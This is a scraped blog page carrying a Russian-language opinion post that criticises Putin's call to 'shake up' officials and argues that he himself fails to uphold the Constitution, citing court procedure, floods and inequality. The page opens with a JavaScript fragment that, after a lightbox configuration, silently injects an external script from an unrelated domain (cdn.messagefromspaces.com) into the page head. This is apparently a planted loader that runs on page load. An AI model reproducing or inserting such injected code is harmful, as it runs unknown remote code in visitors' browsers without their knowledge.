, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Путин призывает, а когда сам подаст пример?

24 Ноя

Путин призвал https://tass.ru/politika/7185315?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews      "Единую Россию" «терзать и трясти» чиновников для решения проблем в регионах.

Президент отметил, что облик и репутацию «Единой России» должны определять люди с внутренней позицией и нравственными ориентирами, а не конъюнктурщики, которые при случае снова сдадут страну.

Да, 16 млн. россиян, имевших партбилеты  членов  КПСС, страну в 90-е сдали. Они отказались поддерживать партию, верхушка которой называла себя: «Ум, честь и совесть эпохи», но этих качеств никогда не имела.

Сам был свидетелем того, как у партийцев из КГБ хватило мужества защитить свои здания на Лубянке.

Одни  предусмотрительно забаррикадировались. Возможно, что секретные документы и архивы они были готовы защищать любой ценой.

Другие окружили здания сплошным кольцом.

Прибывший  на Лубянку советник президента Ельцина по политическим вопросам, депутат Моссовета Сергей Станкевич призывал толпу не буйствовать и обещал снести памятник  Дзержинскому в течение ближайших нескольких часов.

Во время сноса памятника  партийцы из КГБ, стоявшие кольцом вокруг своих зданий, даже не пытались этому помешать.

Сегодня положение в стране  ещё хуже, чем было в августе 1991 года.

Что толку призывать «терзать и трясти» чиновников для решения проблем в регионах, если «терзания» самого Путина и его личное присутствие на месте  трагедии, не помогли тысячам жителей подтопленных домов в Иркутской области.  Многие вынуждены https://www.1tv.ru/news/2019−11−22/376171-zhiteli_irkutskoy_oblasti_posle_navodneniya_v_avguste_prodolzhayut_zhit_v_razrushennyh_domah  и сейчас жить в таких домах.

Зачем рассуждать о «нравственных ориентирах», если созданное Путиным  неравенство в оплате труда, когда руководители предприятий получают в 100−200 раз больше, чем те, кто трудится на них, напрочь эти ориентиры утратило.

Неразумные решения чиновников, которые Путин публично называет https://tass.ru/obschestvo/7172045?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews  «какой-то чушью», делают ещё более нищими  миллионы россиян.

Проблемы в регионах не от того, что кто-то мало «терзает и трясёт» чиновников, а в полной незащищённости россиян от самовластия чиновников.

Не надо перекладывать на кого-то то, что Конституция России возлагает именно на Президента России, являющегося ещё и гарантом Конституции.

Дав клятву уважать и охранять права и свободы человека и гражданина, гарант Конституции обязан был принять меры к установлению власти Конституции.

Как это сделать?

Ответ находим в статье 2 Конституции. —  Обязать назначенцев признавать, соблюдать и защищать права и свободы россиян.

Как только этого не происходит, — удалять чиновника с должности, как не справившегося со своими обязанностями.

Но мы видим, что за 20 лет изгоняют с должностей, только если чиновник проворовался либо стал взяточником.

Дав народу клятву соблюдать и защищать Конституцию, её гарант обязан делать это.

Но Конституционный Суд РФ не раз признавал, что подписанные Путиным законы противоречат Конституции.

А как можно осуществлять защиту Конституции, если её требование: «При осуществлении правосудия не допускается использование доказательств, полученных с нарушением федерального закона», статья 50, невозможно исполнить при особом порядке судебного разбирательства, когда суд не исследует и не оценивает доказательства, собранные по уголовному делу?

И этот, противоречащий Конституции, статья 49,  и части 2 статьи 77 УПК РФ порядок был принят Государственной Думой 21 июня 2003 года, одобрен Советом Федерации 26 июня 2003 года и подписан https://base.garant.ru/1353017/   Президентом Российской Федерации В.В. Путиным.

Более 15 лет, ежегодно в таком порядке осуждают 500−700 тысяч подсудимых, согласившихся с предъявленным им обвинением.

И это происходит в стране, где СМИ постоянно пишут о пыточном судопроизводстве, заставляющем назначенного обвиняемым брать на себя чужую вину, либо признаваться в том, чего не совершал.

Если Конституция России требует судей подчиняться, беспрекословно слушаться, повиноваться, быть в зависимости от Конституции, а также от  порядка судопроизводства, изложенного в процессуальных законах, то в стране должны быть механизмы, контролирующие исполнение это судьями.

Кто обязан создать такой механизм?

Ответ опять находим в Конституции, статья 83.

Президент России представляет кандидатуры для назначения на должности судей, вышестоящих судов, а также назначает судей других федеральных судов.

Если глава государства формирует состав исполнителей судебной власти, то именно он обязан позаботиться о механизме, который заставит судей быть в зависимости от Конституции.

Но этого нет. Поэтому, не исполняется ещё одно конституционное требование, -  гарантированное каждому право на судебную защиту от действий или бездействия и решений органов власти и должностных лиц, статья 46.

Не лучше ли Путину от призывов перейти к исполнению того, что требует воля народа, изложенная в Конституции России? Пять лет впереди.

За 74 года моей жизни я наслышался разных призывов лиц, что руководили нашей страной, но они не сделали мою страну правовым государством. Надежд, что сделают, уже никаких.

Вот и сейчас всё идёт к тому, что было в 90-е.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.